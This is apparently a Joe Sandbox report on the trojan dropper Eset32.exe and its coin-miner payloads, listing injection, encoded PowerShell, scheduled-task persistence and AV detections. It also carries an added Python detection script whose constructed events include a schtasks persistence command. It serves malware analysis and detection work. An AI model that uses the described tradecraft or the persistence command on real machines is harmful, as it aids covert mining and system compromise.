Source: C:\Users\user\AppData\Roaming\Windows\System.exe Queries volume information: C:\Users\user\AppData\Roaming\Windows\System.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows\System.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\12.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Roaming\1.exeCode function: 4_2_00409CDC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00409CDC
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
MITRE ATT&CK Matrix (columns: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact). Techniques carrying signature matches, by tactic:
Initial Access: none
Execution: Windows Management Instrumentation; Native API; Command and Scripting Interpreter; Scheduled Task/Job; PowerShell
Persistence: Scheduled Task/Job
Privilege Escalation: Access Token Manipulation; Process Injection; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools; Deobfuscate/Decode Files or Information; Obfuscated Files or Information; Software Packing; Masquerading; Virtualization/Sandbox Evasion; Access Token Manipulation; Process Injection
Credential Access: none
Discovery: System Time Discovery; File and Directory Discovery; System Information Discovery; Query Registry; Security Software Discovery; Process Discovery; Virtualization/Sandbox Evasion; Application Window Discovery; Remote System Discovery; System Network Configuration Discovery
Lateral Movement: none
Collection: Archive Collected Data; Clipboard Data
Exfiltration: none
Command and Control: Ingress Tool Transfer; Encrypted Channel; Non-Application Layer Protocol; Application Layer Protocol
Network Effects: none
Remote Service Effects: none
Impact: System Shutdown/Reboot
Behavior Graph (ID 596584; sample Eset32.exe; start date 24/03/2022; architecture Windows; score 100). Numbers in square brackets are the created-registry-values / created-files counts shown on the graph nodes.

Start node signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 7 other signatures

Eset32.exe [9]
  dropped C:\Users\user\AppData\Roaming\12.exe (PE32+)
  dropped C:\Users\user\AppData\Roaming\1.exe (PE32)
  started 12.exe [5]
    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    dropped C:\Users\user\AppData\Roaming\...\System.exe (PE32+)
    started cmd.exe
      started System.exe
        dropped C:\Users\user\AppData\...\sihost64.exe (PE32+)
        started sihost64.exe
          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
        started cmd.exe
          signatures: Encrypted powershell cmdline option found
          started conhost.exe
          started powershell.exe
          started powershell.exe
      started conhost.exe
    started cmd.exe [1]
      signatures: Encrypted powershell cmdline option found; Uses schtasks.exe or at.exe to add and modify task schedules
      started powershell.exe [22]
      started powershell.exe [18]
      started conhost.exe
    started cmd.exe
      started conhost.exe
      started schtasks.exe
  started 1.exe [1]
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    started AppLaunch.exe [15 3]
      network: ip-api.com (208.95.112.1), ports 49773 -> 80, TUT-ASUS, United States
      signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); May check the online IP address of the machine
    started conhost.exe

System.exe (second root, started directly from the start node)
  signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  started cmd.exe
    signatures: Encrypted powershell cmdline option found
    started conhost.exe
    started powershell.exe
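The behavior graph is, in effect, a process-creation log: parent/child links, image paths, an encoded PowerShell option passed through cmd.exe, schtasks.exe registering a task that runs from AppData, and a lookalike sihost64.exe running from a user profile. The following is an added example (not part of the Joe Sandbox report) of detection logic over such events, written in Python. The events are constructed to mirror the graph; the numeric IDs are the graph's node numbers rather than real PIDs, and the command-line contents, the task's schtasks arguments and the AppLaunch.exe path are assumptions, because the report shows none of them.

```python
"""Process-chain detection over constructed process-creation events.

Added example, not part of the Joe Sandbox report. The events mirror the
behavior graph above; command lines and the AppLaunch.exe path are assumed.
"""
import base64
import re

# Constructed stand-in for the encoded command (the real one is not on the page).
PS_PAYLOAD = "Write-Output 'constructed placeholder'"
ENCODED = base64.b64encode(PS_PAYLOAD.encode("utf-16le")).decode("ascii")
# Task name and target path come from the report's timeline; the flags are assumed.
TASK_CMD = r'schtasks /create /f /tn System /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"'

EVENTS = [
    {"pid": 10, "ppid": 2, "image": r"C:\Users\user\Desktop\Eset32.exe", "cmdline": "Eset32.exe"},
    {"pid": 16, "ppid": 10, "image": r"C:\Users\user\AppData\Roaming\12.exe", "cmdline": "12.exe"},
    {"pid": 20, "ppid": 10, "image": r"C:\Users\user\AppData\Roaming\1.exe", "cmdline": "1.exe"},
    # AppLaunch.exe path assumed (.NET Framework 4 location); the report names only the image.
    {"pid": 31, "ppid": 20, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
     "cmdline": "AppLaunch.exe"},
    {"pid": 24, "ppid": 16, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\user\AppData\Roaming\Windows\System.exe"'},
    {"pid": 26, "ppid": 16, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell.exe -NoP -W Hidden -enc " + ENCODED},
    {"pid": 45, "ppid": 26, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + ENCODED},
    {"pid": 29, "ppid": 16, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c " + TASK_CMD},
    {"pid": 53, "ppid": 29, "image": r"C:\Windows\System32\schtasks.exe", "cmdline": TASK_CMD},
    {"pid": 40, "ppid": 24, "image": r"C:\Users\user\AppData\Roaming\Windows\System.exe", "cmdline": "System.exe"},
    {"pid": 55, "ppid": 40, "image": r"C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe",
     "cmdline": "sihost64.exe"},
]

USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(appdata|desktop|downloads|documents)\\", re.I)
# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
TASK_RUN_RE = re.compile(r'/tr\s+"?([^"]+?)"?(?:\s|$)', re.I)
# Names of Windows binaries that live in System32; a lookalike such as sihost64.exe
# under a user profile deserves a look. Constructed list, extend as needed.
SYSTEM_NAME_PREFIXES = ("sihost", "svchost", "csrss", "lsass", "winlogon", "conhost")


def basename(path):
    return path.rsplit("\\", 1)[-1]


def ancestry(events, pid):
    """Image names from pid up to the root, e.g. ['sihost64.exe', 'System.exe', ...]."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Return (rule, pid, detail) tuples for the three behaviours in the graph."""
    findings = []
    for e in events:
        name = basename(e["image"]).lower()
        cmd = e["cmdline"]
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            findings.append(("encoded_powershell", e["pid"], decoded))
        if name == "schtasks.exe" and "/create" in cmd.lower():
            m = TASK_RUN_RE.search(cmd)
            if m and USER_WRITABLE.match(m.group(1)):
                findings.append(("task_runs_from_user_writable_path", e["pid"], m.group(1)))
        if USER_WRITABLE.match(e["image"]) and name.startswith(SYSTEM_NAME_PREFIXES):
            findings.append(("system_binary_name_outside_system32", e["pid"], e["image"]))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(rule, pid, " <- ".join(ancestry(EVENTS, pid)), detail, sep=" | ")
```

Decoding the encoded command rather than merely flagging it matters in practice: the decoded text is what you hand to the analyst, and the ancestry chain (sihost64.exe back to Eset32.exe) is what ties the persistence artifact to the original dropper. Real Sysmon or EDR events carry the same four fields used here, so the functions transfer directly.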

Source | Detection | Scanner | Label
Eset32.exe | 63% | Virustotal |
Eset32.exe | 14% | Metadefender |
Eset32.exe | 60% | ReversingLabs | Win32.Trojan.Zenpak
Eset32.exe | 100% | Avira | HEUR/AGEN.1210313
Eset32.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe | 100% | Avira | HEUR/AGEN.1235806
C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\1.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\12.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Windows\System.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\1.exe | 37% | Virustotal |
C:\Users\user\AppData\Roaming\1.exe | 45% | ReversingLabs | Win32.Trojan.Zenpak
C:\Users\user\AppData\Roaming\12.exe | 60% | Virustotal |
C:\Users\user\AppData\Roaming\12.exe | 60% | ReversingLabs | ByteCode-MSIL.Trojan.CoinminerX
C:\Users\user\AppData\Roaming\Windows\System.exe | 60% | Virustotal |
C:\Users\user\AppData\Roaming\Windows\System.exe | 60% | ReversingLabs | ByteCode-MSIL.Trojan.CoinminerX
C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe | 30% | Virustotal |
C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.Tedy
Source | Detection | Scanner | Label
36.0.sihost64.exe.fe0000.0.unpack | 100% | Avira | HEUR/AGEN.1235806
6.2.AppLaunch.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203048
1.2.12.exe.370000.0.unpack | 100% | Avira | HEUR/AGEN.1221928
22.0.System.exe.1c0000.0.unpack | 100% | Avira | HEUR/AGEN.1221928
0.0.Eset32.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
26.2.System.exe.d10000.0.unpack | 100% | Avira | HEUR/AGEN.1221928
0.2.Eset32.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
26.0.System.exe.d10000.0.unpack | 100% | Avira | HEUR/AGEN.1221928
1.0.12.exe.370000.0.unpack | 100% | Avira | HEUR/AGEN.1221928
36.2.sihost64.exe.fe0000.0.unpack | 100% | Avira | HEUR/AGEN.1235806
4.3.1.exe.2610000.0.unpack | 100% | Avira | HEUR/AGEN.1203048
22.2.System.exe.1c0000.0.unpack | 100% | Avira | HEUR/AGEN.1221928
            No Antivirus matches
Source | Detection | Scanner | Label
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://ocsp.entrust.net02 | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
https://pidgin.im0 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
http://crl.mi | 0% | URL Reputation | safe
http://ip-api.com4 | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://www.jsonrpc.org/ | 0% | URL Reputation | safe
http://crl.micros | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://sectigo.com/CPS0 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net03 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net02 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 0000000A.00000002.510560064.0000021A948A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511051451.0000021A94B38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511415597.0000021A94D18000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.entrust.net/rpa03 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://aia.entrust.net/ts1-chain256.cer01 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | | high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
https://pidgin.im0 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | Eset32.exe | false | | high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/openwall/john/issues/3454#issuecomment-436899959 | System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mi | powershell.exe, 0000001E.00000002.634745548.0000024FA5AC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com4 | AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_Error | Eset32.exe | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708582880.0000000006C17000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jsonrpc.org/ | System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.codeplex.com/DotNetZip | AppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmp | false | | high
http://crl.entrust.net/ts1ca.crl0 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 12.exe, 00000001.00000002.552111888.0000000003495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.501374621.0000021A936C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.624837713.0000024F8D681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.679354335.000002BE88901000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.entrust.net/rpa0 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | | high
http://crl.entrust.net/2048ca.crl0 | Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | false | | high
http://crl.micros | powershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.gnu.org/licenses/ | System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:596584
                                                    Start date and time:2022-03-24 21:08:24 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 14m 3s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:Eset32.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:37
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.mine.winEXE@40/23@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 33.3%
                                                    HDC Information:
                                                    • Successful, ratio: 15.9% (good quality ratio 15.3%)
                                                    • Quality average: 83.3%
                                                    • Quality standard deviation: 24.9%
                                                    HCA Information:
                                                    • Successful, ratio: 74%
                                                    • Number of executed functions: 168
                                                    • Number of non-executed functions: 34
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 40.125.122.176, 20.54.89.106, 52.152.110.14, 20.54.110.249, 52.242.101.226
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target 1.exe, PID 6656 because there are no executed functions
                                                    • Execution Graph export aborted for target 12.exe, PID 5164 because it is empty
                                                    • Execution Graph export aborted for target System.exe, PID 3408 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 2600 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
22:09:51 | API Interceptor | 126x Sleep call for process: powershell.exe modified
22:10:22 | API Interceptor | 2x Sleep call for process: 12.exe modified
22:10:30 | Task Scheduler | Run new task: System path: C:\Users\user\AppData\Roaming\Windows\System.exe
22:11:17 | API Interceptor | 1x Sleep call for process: System.exe modified
                                                    No context
                                                    Process:C:\Users\user\AppData\Roaming\12.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):973
                                                    Entropy (8bit):5.374440234733254
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPTxAIDAWDLI4MWuCWzAbDLI4MNCIBTa51KDLI4MN5P6D1Bakvoc:ML9E4KrVE4K5sXE4+21qE4GiD0E4KeGj
                                                    MD5:55B1C358C76C36555547AB8BA39CB42E
                                                    SHA1:63BD54BA7CB70FB481C8D625EBA24A5E2D6564F2
                                                    SHA-256:33367C74DE2EC5A5DE6FDAD331DCBF09EB0C8EA333708F7CD3C0228D8A466240
                                                    SHA-512:D33E61E1A6304955B413893AEC1C82A13F60D775888F47E74E37F747A63CF7FB6DDF2F9963157AC061845065E436AF4F677BC22EF5346E1FF1716FE5D0DB4A50
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..
                                                    Process:C:\Users\user\AppData\Roaming\Windows\System.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):973
                                                    Entropy (8bit):5.374440234733254
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPTxAIDAWDLI4MWuCWzAbDLI4MNCIBTa51KDLI4MN5P6D1Bakvoc:ML9E4KrVE4K5sXE4+21qE4GiD0E4KeGj
                                                    MD5:55B1C358C76C36555547AB8BA39CB42E
                                                    SHA1:63BD54BA7CB70FB481C8D625EBA24A5E2D6564F2
                                                    SHA-256:33367C74DE2EC5A5DE6FDAD331DCBF09EB0C8EA333708F7CD3C0228D8A466240
                                                    SHA-512:D33E61E1A6304955B413893AEC1C82A13F60D775888F47E74E37F747A63CF7FB6DDF2F9963157AC061845065E436AF4F677BC22EF5346E1FF1716FE5D0DB4A50
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):18817
                                                    Entropy (8bit):5.001217266823362
                                                    Encrypted:false
                                                    SSDEEP:384:sEvOjJiYoWVoGIpN6KQkj2dNXp5FOdBo+ib4+jjkjh4iUxL2c+4Jib4J:s0MiYoWV3IpNBQkj2dNZvOdBopj2h4iu
                                                    MD5:A30A545B73C738B58F7D7089B1C9FF63
                                                    SHA1:2F4784CFB523E34E6492F67EF7A04C7A20F16872
                                                    SHA-256:2F1991061F8982C2AAB4D49CAF78BE84E1282EFED26BE6775989B0EC4C9464BC
                                                    SHA-512:3C2DE1D82999C46EC2BA11DBA721E011950DC510F67E3226D61DF7CA9579F1F95F0BE7BE31A2BD61E92DDD1930563061131614C59D81472A92DBF529A1143316
                                                    Malicious:false
                                                    Reputation:unknown
